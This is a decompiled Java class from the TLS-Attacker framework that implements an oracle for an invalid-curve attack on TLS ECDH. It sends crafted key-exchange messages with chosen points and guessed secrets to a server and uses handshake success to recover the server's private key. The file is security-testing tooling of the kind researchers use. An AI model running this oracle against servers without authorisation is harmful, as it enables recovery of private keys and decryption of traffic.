/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.ec.oracles;

import de.rub.nds.modifiablevariable.ModifiableVariableFactory;
import de.rub.nds.modifiablevariable.biginteger.BigIntegerModificationFactory;
import de.rub.nds.modifiablevariable.biginteger.ModifiableBigInteger;
import de.rub.nds.modifiablevariable.bytearray.ByteArrayModificationFactory;
import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
import de.rub.nds.tlsattacker.attacks.ec.oracles.ECOracle;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
import de.rub.nds.tlsattacker.core.constants.RunningModeType;
import de.rub.nds.tlsattacker.core.crypto.ec.EllipticCurve;
import de.rub.nds.tlsattacker.core.crypto.ec.Point;
import de.rub.nds.tlsattacker.core.exceptions.WorkflowExecutionException;
import de.rub.nds.tlsattacker.core.protocol.message.ECDHClientKeyExchangeMessage;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
import java.math.BigInteger;
import java.util.Arrays;
import org.apache.logging.log4j.Level;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.core.LoggerContext;
import org.apache.logging.log4j.core.config.Configuration;
import org.apache.logging.log4j.core.config.LoggerConfig;
import org.bouncycastle.util.BigIntegers;

public class RealDirectMessageECOracle
extends ECOracle {
    private static final Logger LOGGER = LogManager.getLogger();
    private final Config config;
    private Point checkPoint;
    private byte[] checkPMS;

    public RealDirectMessageECOracle(Config config, EllipticCurve curve) {
        this.config = config;
        this.curve = curve;
        this.executeValidWorkflowAndExtractCheckValues();
        LoggerContext ctx = (LoggerContext)LogManager.getContext((boolean)false);
        Configuration ctxConfig = ctx.getConfiguration();
        LoggerConfig loggerConfig = ctxConfig.getLoggerConfig("");
        loggerConfig.setLevel(Level.INFO);
        ctx.updateLoggers();
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    @Override
    public boolean checkSecretCorrectnes(Point ecPoint, BigInteger secret) {
        WorkflowTrace trace = new WorkflowConfigurationFactory(this.config).createWorkflowTrace(WorkflowTraceType.HANDSHAKE, RunningModeType.CLIENT);
        ECDHClientKeyExchangeMessage message = (ECDHClientKeyExchangeMessage)WorkflowTraceUtil.getFirstSendMessage(HandshakeMessageType.CLIENT_KEY_EXCHANGE, trace);
        message.prepareComputations();
        ModifiableBigInteger x = ModifiableVariableFactory.createBigIntegerModifiableVariable();
        x.setModification(BigIntegerModificationFactory.explicitValue((BigInteger)ecPoint.getX().getData()));
        message.getComputations().setPublicKeyX(x);
        ModifiableBigInteger y = ModifiableVariableFactory.createBigIntegerModifiableVariable();
        y.setModification(BigIntegerModificationFactory.explicitValue((BigInteger)ecPoint.getY().getData()));
        message.getComputations().setPublicKeyY(y);
        ModifiableByteArray pms = ModifiableVariableFactory.createByteArrayModifiableVariable();
        byte[] explicitePMS = BigIntegers.asUnsignedByteArray((int)(this.curve.getModulus().bitLength() / 8), (BigInteger)secret);
        pms.setModification(ByteArrayModificationFactory.explicitValue((byte[])explicitePMS));
        message.getComputations().setPremasterSecret(pms);
        if (this.numberOfQueries % 100L == 0L) {
            LOGGER.info("Number of queries so far: {}", (Object)this.numberOfQueries);
        }
        State state = new State(this.config, trace);
        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(this.config.getWorkflowExecutorType(), state);
        boolean valid = true;
        try {
            workflowExecutor.executeWorkflow();
        }
        catch (WorkflowExecutionException e) {
            valid = false;
            LOGGER.warn((Object)e);
        }
        finally {
            ++this.numberOfQueries;
        }
        if (!state.getWorkflowTrace().executedAsPlanned()) {
            valid = false;
        }
        return valid;
    }

    @Override
    public boolean isFinalSolutionCorrect(BigInteger guessedSecret) {
        Point p = this.curve.mult(guessedSecret, this.checkPoint);
        byte[] pms = BigIntegers.asUnsignedByteArray((int)(this.curve.getModulus().bitLength() / 8), (BigInteger)p.getX().getData());
        return Arrays.equals(this.checkPMS, pms);
    }

    private void executeValidWorkflowAndExtractCheckValues() {
        State state = new State(this.config);
        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(this.config.getWorkflowExecutorType(), state);
        WorkflowTrace trace = state.getWorkflowTrace();
        workflowExecutor.executeWorkflow();
        ECDHClientKeyExchangeMessage message = (ECDHClientKeyExchangeMessage)WorkflowTraceUtil.getFirstSendMessage(HandshakeMessageType.CLIENT_KEY_EXCHANGE, trace);
        BigInteger x = (BigInteger)message.getComputations().getPublicKeyX().getValue();
        BigInteger y = (BigInteger)message.getComputations().getPublicKeyY().getValue();
        this.checkPoint = Point.createPoint(x, y, state.getTlsContext().getSelectedGroup());
        this.checkPMS = (byte[])message.getComputations().getPremasterSecret().getValue();
    }
}

